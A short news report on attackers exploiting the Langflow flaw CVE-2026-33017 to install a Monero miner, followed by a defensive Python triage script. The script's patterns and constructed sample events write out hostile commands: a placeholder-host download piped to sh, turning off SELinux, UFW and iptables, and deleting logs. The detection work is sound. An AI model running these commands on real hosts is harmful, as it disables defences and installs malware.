Threat actors are actively exploiting a critical vulnerability in Langflow, tracked as CVE-2026-33017, to deploy a Monero cryptocurrency miner, according to Trend Micro. The vulnerability, which has a CVSS score of 9.3, allows unauthenticated remote code execution, giving attackers initial access to enterprise networks through exposed artificial intelligence application endpoints. The exploitation campaign was observed between March 27 and April 15, 2026, with further coverage provided by The Hacker News.

The attack chain begins with a single line of Python code executed via an unauthenticated Langflow API endpoint. This code downloads a shell script that fetches and launches a cryptocurrency miner binary as a detached process. The malware is designed to terminate competing miners from groups like Kinsing and WatchDog, remove rival wallet data, disable security controls, and establish persistence through cron jobs. It also spreads to other systems via reused SSH keys.

The miner binary, written in Go, disables security measures such as AppArmor, UFW, iptables, SELinux, and cloud security agents. It also removes system logs and manipulates file attributes to maintain its presence. The campaign highlights how exposed AI application endpoints are becoming a new entry point for threat actors.

Source: The Hacker News
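One way to triage hosts for the post-compromise behaviours described above, as an added example that is not from Trend Micro or The Hacker News: it tags process-execution events with the behaviours the article lists and flags hosts that show three or more distinct ones. The event format, host names, regex patterns and threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Heuristic patterns (assumptions) for the behaviours the article lists.
BEHAVIOURS = {
    "download_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "kill_rival_miner": re.compile(r"\b(pkill|killall)\b.*\b(kinsing|watchdog)", re.I),
    "disable_controls": re.compile(
        r"systemctl\s+(stop|disable)\s+(apparmor|ufw)|\bufw\s+disable\b"
        r"|\biptables\s+-F\b|\bsetenforce\s+0\b"),
    "cron_persistence": re.compile(r"\bcrontab\s+-\s*$|>>?\s*/etc/cron"),
    "log_removal": re.compile(r"\brm\s+-\w*f\w*\s+.*?/var/log/"),
    "attr_tamper": re.compile(r"\bchattr\s+[+-]\w*i"),
}

# Constructed sample events, one per line: host|parent process|command line.
SAMPLE = """\
ai-01|python3|sh -c curl -s http://placeholder.invalid/x.sh | sh
ai-01|sh|pkill -9 -f kinsing
ai-01|sh|setenforce 0
ai-01|sh|ufw disable
ai-01|sh|crontab -
ai-01|sh|rm -rf /var/log/syslog
ai-01|sh|chattr +i /tmp/placeholder-miner
web-02|bash|iptables -F
web-02|cron|rm -f /var/log/app/old.log.1
db-03|sshd|crontab -l
"""

def classify(cmdline):
    """Return the set of behaviour tags whose pattern matches the command line."""
    return {name for name, rx in BEHAVIOURS.items() if rx.search(cmdline)}

def triage(log_text, threshold=3):
    """Group tags per host; report hosts with at least `threshold` distinct tags."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        # Split on the first two pipes only, so pipes in the command survive.
        host, _parent, cmd = line.split("|", 2)
        seen[host] |= classify(cmd)
    return {h: sorted(b) for h, b in seen.items() if len(b) >= threshold}

if __name__ == "__main__":
    for host, tags in triage(SAMPLE).items():
        print(host, tags)
```

Requiring several distinct behaviours on one host keeps routine administration, such as the firewall flush and log cleanup on the constructed `web-02`, from raising an alert by itself.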



